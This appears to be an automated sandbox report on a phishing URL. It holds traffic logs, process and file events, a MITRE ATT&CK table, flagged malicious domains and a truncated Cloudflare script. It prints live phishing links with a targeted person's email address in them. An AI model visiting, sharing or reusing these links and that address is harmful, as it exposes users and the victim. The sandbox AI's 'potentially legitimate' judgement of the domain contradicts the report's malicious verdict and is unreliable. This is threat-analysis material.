Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49873
Source: unknown	Network traffic detected: HTTP traffic on port 49923 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49994
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49872
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49993
Source: unknown	Network traffic detected: HTTP traffic on port 50016 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49871
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49992
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49870
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49991
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49990
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49874 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49934 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50027 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49869
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49868
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49989
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49867
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49988
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49866
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49987
Source: unknown	Network traffic detected: HTTP traffic on port 50013 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50036 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50059 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49906 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49849 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49900 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50060 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49929 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49872 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50025 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49964 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49861 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49999 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49918 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49873 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49930 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50001 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49986 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49850 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49963 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50007
Source: unknown	Network traffic detected: HTTP traffic on port 50037 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50006
Source: unknown	Network traffic detected: HTTP traffic on port 50012 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50009
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50008
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 49952 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50001
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50000
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50003
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50002
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50005
Source: unknown	Network traffic detected: HTTP traffic on port 49895 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50004
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50048 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49884 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49907 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49941 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 49997 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49859 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49871 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49894 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50003 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49942 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50035 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49919 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49954 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50014 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49988 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50046 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49848 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49882 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49953 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50047 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49908 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50024 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49860 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49883 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49998 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49931 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50058 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50002 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49987 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49920 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50069 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49926 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49949 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50054
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50053
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50056
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50055
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50058
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50057
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50059
Source: unknown	Network traffic detected: HTTP traffic on port 49961 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49984 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50022 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50060
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50063
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50062
Source: unknown	Network traffic detected: HTTP traffic on port 50045 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49881 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49950 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49996 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50010 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50065
Source: unknown	Network traffic detected: HTTP traffic on port 49858 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50064
Source: unknown	Network traffic detected: HTTP traffic on port 50056 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50066
Source: unknown	Network traffic detected: HTTP traffic on port 49893 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50069
Source: unknown	Network traffic detected: HTTP traffic on port 49915 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49869 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50009 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50034 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49972 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50057 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49892 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49904 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49927 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49870 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49983 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49938 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50023 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50018
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50017
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50019
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49951 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50032 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50010
Source: unknown	Network traffic detected: HTTP traffic on port 49836 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49916 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50012
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50011
Source: unknown	Network traffic detected: HTTP traffic on port 50055 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50014
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50013
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50016
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50015
Source: unknown	Network traffic detected: HTTP traffic on port 49939 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49845 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49868 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50029
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50028
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50021
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50020
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50023
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50022
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50025
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50024
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50027
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49879 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50026
Source: unknown	Network traffic detected: HTTP traffic on port 49985 -> 443

Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.16:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.16:49770 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.16:49987 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.16:49995 version: TLS 1.2

Source: classification engine

Classification label: mal60.phis.troj.win@21/24@32/207

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 --field-trial-handle=1956,i,6581263779815864147,17771507680749106533,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://keep.za.com/cgi//redirect.php#rbruening@elford.com"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 --field-trial-handle=1956,i,6581263779815864147,17771507680749106533,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown

Source: Window Recorder

Window detected: More than 3 window changes detected

Data Obfuscation

Yara detected Html Dropper

Source: Yara match	File source: 2.12..script.csv, type: HTML
Source: Yara match	File source: dropped/chromecache_87, type: DROPPED

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 Browser Extensions	1 Process Injection	1 Masquerading	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	2 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Registry Run Keys / Startup Folder	1 Registry Run Keys / Startup Folder	1 Process Injection	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
https://keep.za.com/cgi//redirect.php#rbruening@elford.com	0%	Avira URL Cloud	safe

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

⊘No Antivirus matches

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
a.nel.cloudflare.com	35.190.80.1	true	false		high
code.jquery.com	151.101.2.137	true	false		high
server.linxcoded.store	185.174.100.20	true	false		unknown
challenges.cloudflare.com	104.18.94.41	true	false		high
avsbtech.store	66.29.137.28	true	true		unknown
s-part-0017.t-0009.t-msedge.net	13.107.246.45	true	false		high
www.google.com	142.250.185.196	true	false		high
api.ipify.org	104.26.13.205	true	false		high
linxcoded.store	162.0.229.203	true	false		unknown
keep.za.com	104.21.87.64	true	true		unknown
_6060._https.server.linxcoded.store	unknown	unknown	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://keep.za.com/cgi/b63fc8d582eda5fa.html?uid=rbruening%40elford.com	true		unknown
https://keep.za.com/cgi//redirect.php#rbruening@elford.com	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
172.67.142.1	unknown	United States		13335	CLOUDFLARENETUS	false
1.1.1.1	unknown	Australia		13335	CLOUDFLARENETUS	false
104.21.87.64	keep.za.com	United States		13335	CLOUDFLARENETUS	true
13.107.246.45	s-part-0017.t-0009.t-msedge.net	United States		8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
104.18.94.41	challenges.cloudflare.com	United States		13335	CLOUDFLARENETUS	false
185.174.100.20	server.linxcoded.store	Ukraine		8100	ASN-QUADRANET-GLOBALUS	false
74.125.71.84	unknown	United States		15169	GOOGLEUS	false
172.217.23.106	unknown	United States		15169	GOOGLEUS	false
142.250.181.234	unknown	United States		15169	GOOGLEUS	false
151.101.2.137	code.jquery.com	United States		54113	FASTLYUS	false
239.255.255.250	unknown	Reserved		unknown	unknown	false
142.250.185.196	www.google.com	United States		15169	GOOGLEUS	false
142.250.185.163	unknown	United States		15169	GOOGLEUS	false
142.250.185.142	unknown	United States		15169	GOOGLEUS	false
66.29.137.28	avsbtech.store	United States		19538	ADVANTAGECOMUS	true
142.250.186.142	unknown	United States		15169	GOOGLEUS	false
162.0.229.203	linxcoded.store	Canada		22612	NAMECHEAP-NETUS	false
35.190.80.1	a.nel.cloudflare.com	United States		15169	GOOGLEUS	false
172.217.18.99	unknown	United States		15169	GOOGLEUS	false
104.26.13.205	api.ipify.org	United States		13335	CLOUDFLARENETUS	false

Private

IP
192.168.2.16

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1608754
Start date and time:	2025-02-06 22:21:19 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsinteractivecookbook.jbs
Sample URL:	https://keep.za.com/cgi//redirect.php#rbruening@elford.com
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	EGA enabled
Analysis Mode:	stream
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal60.phis.troj.win@21/24@32/207

Warnings

Exclude process from analysis (whitelisted): svchost.exe
Excluded IPs from analysis (whitelisted): 172.217.18.99, 142.250.185.142, 74.125.71.84, 216.58.206.46, 142.250.184.238
Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, redirector.gvt1.com, clientservices.googleapis.com, clients.l.google.com
Not all processes where analyzed, report is missing behavior information
VT rate limit hit for: https://keep.za.com/cgi//redirect.php#rbruening@elford.com

LLM Input / Output

Input	Output
URL: https://keep.za.com Model: Joe Sandbox AI	```json{ "brand": "unknown", "brand_classification": "unknown", "legit_url": "unknown", "similarity": 0, "spoofed": 0, "reasoning": "The URL 'https://keep.za.com' does not closely resemble any known brand or legitimate URL. The domain 'za.com' is a generic domain extension and does not inherently suggest a connection to a specific brand. The subdomain 'keep' is a common English word and does not imply any specific brand association. There are no visual character substitutions or structural changes that suggest typosquatting. The URL appears to be a generic or potentially legitimate use of the domain without any indication of an attempt to deceive users into thinking it is associated with a well-known brand."}
URL: https://keep.za.com
URL: https://keep.za.com/cgi//redirect.php#rbruening@el... Model: Joe Sandbox AI	{ "risk_score": 6, "reasoning": "The script exhibits several moderate-risk behaviors, including external data transmission, use of fallback domains, and aggressive DOM manipulation. While the script appears to have an analytics or telemetry purpose, the use of obfuscated code and interaction with potentially untrusted domains raises concerns and requires further review." }
(function(){window._cf_chl_opt={cvId: '3',cZone: "keep.za.com",cType: 'non-interactive',cRay: '90de31371e4b42d2',cH: 'nO71zZEMI7P2yV1dPEYZj7exDr2.8AVhPuyGG9dP0oI-1738876911-1.2.1.1-yWzNC5Y5C6j20fTdnbwDhGX_rnPEwHRF5HstZ0VgntOkxuM9R5KbimLnz4basuiW',cUPMDTk: "\/cgi\/\/redirect.php?__cf_chl_tk=nKPshaaSJAE11yI14VHBwg_vv7V6Ic9yvLHLoPHJ.zc-1738876911-1.0.1.1-1_DYVv6qwa0jOO6t1d7V.xEQIXSzXH3nxhrLo35pN2Y",cFPWv: 'g',cITimeS: '1738876911',cTTimeMs: '1000',cMTimeMs: '120000',cTplC: 0,cTplV: 5,cTplB: 'cf',cK: "",fa: "\/cgi\/\/redirect.php?__cf_chl_f_tk=nKPshaaSJAE11yI14VHBwg_vv7V6Ic9yvLHLoPHJ.zc-1738876911-1.0.1.1-1_DYVv6qwa0jOO6t1d7V.xEQIXSzXH3nxhrLo35pN2Y",md: "o3n_WM1RQqpgttMxz89qfZoQPHAtZT9GbxV8t6JrNa4-1738876911-1.2.1.1-dse7Brfx6inGPPr93h5CKMGyf2sdnKHdec3UuoYdxWN9C6xEipRtlZX9b56doX_tPpmd2RITGm5JdosOa2kfgduNNMn79AEK.fOs8P8nasFPtAEqy3eNKP8UiuqW00XDFy.7TCZGdtSDFuzuxAVJiymlMzkK0Ef2vJuS3qBnvnVZ6L.JlHMjfgHTrHqulf.7YgOx8ze31J6UzR8zxYpsl2Iex01vphEvvuE.y1tyzuQfq1C.KdOgXoggDFHsvPC2Vc4xUGKNIT5w1SXLhS.Aecxa4KIuKKXO9COc0NnT_AXMzLV5nWwpDz5XyRBd64217xaGDDxUv1m_g5WE4Okn0KxZ5usK2l9frMeWZHijn5btek5NY6pBlF3kL3fbQJd2oyXCqjZPlFpnku.OjALX86_5zkWxcd9jpgOjwxtpoEguffWc.kj3kepBprEm6L__m8HlAsZxCMbbFBdAhWINuDMz1BUYzSDtk7PpGL9KFrLgiuyO7PgX6NGScJ.i15c52jQ.mdUHu7HcAbx763sGiFx7fq2VN5F0ntNi0kljHS0Lj6cHeouzbqjQ1X0Bu5ABsgeiw6ChyMHrOdcOrGn.dguZlRIbvxsF8x9wwxNaxneeIQmqtZSHWvIcycjWH335iZD.OcG6QuwwgC1Z0bNJbVpEqqR89MbepbjSfUyTolF7gASirnp2gpKDgMbgQQpTBaBfv1WBOMqjboNmN6UDqbXHg8PSIEKIl6d4c1F.zInF4fRa0VuNnqkuHOex4mewUzgsBwOO5eWwMYIB.p6yhBYqJjdt33pVNRTdt_NBpoAVnNKWh3mYPbE__sMh17_YPtf0v7l7FnpNT7w0mQOisvYWlafTl2yPbxtQV3o8n3G2.Spy20XqTc5Rd.72HH.eUty1_ACBU.UAWO_c9SklyKoR36HcsW6PsmTjvHDs2msJnhKWEd5M0rU7qVeVYz3T0QKSA0yOSwRqKDDBswZgIw6cQun3n0HNeWgRIxPurzbSIfsyC3BnncwzmYOCWXn7uoWA2F1p2uVT4cPc4Sv_wMj_Mtfa35HvELVprLco3F1r4JczKVMrGwGdo5FnjUA1q3yAX3P3rjKa2PP89H_krGQ_mtBxaJSQLkUToVyvArnFLaBN.xnaDggG4ChXu4fxSVz2G9ihhcWq_Wl